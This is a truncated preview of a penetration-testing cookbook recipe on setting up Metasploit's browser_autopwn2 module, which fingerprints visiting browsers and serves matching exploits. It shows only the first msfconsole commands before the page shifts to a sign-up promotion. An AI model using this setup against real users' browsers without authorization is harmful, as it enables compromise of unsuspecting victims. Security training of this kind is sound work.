Using Metasploit's browser_autpwn2 to attack a client

Metasploit Framework includes a huge collection of client-side exploits, many of them are meant to exploit known vulnerabilities in web browsers and there is a module that has the ability to detect the version of browser the client is using and picks the best exploit to trigger, this module is browser_autopwn or browser_autopwn2, in its newest version.

In this recipe, we will set up an attack with browser_autopwn2 and get it ready for a victim to come in.

How to do it...

Start msfconsole.
We will use version 2 of Browser Autopwn (BAP2):
```
use auxiliary/server/browser_autopwn2
```
Let's take a look at what configurable options it has:
```
show options
```
We will set our Kali server to receive connections:
```
set SRVHOST ...
```

Get Kali Linux Web Penetration Testing Cookbook now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Kali Linux Web Penetration Testing Cookbook by Gilberto Nájera-Gutiérrez

Using Metasploit's browser_autpwn2 to attack a client

How to do it...

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly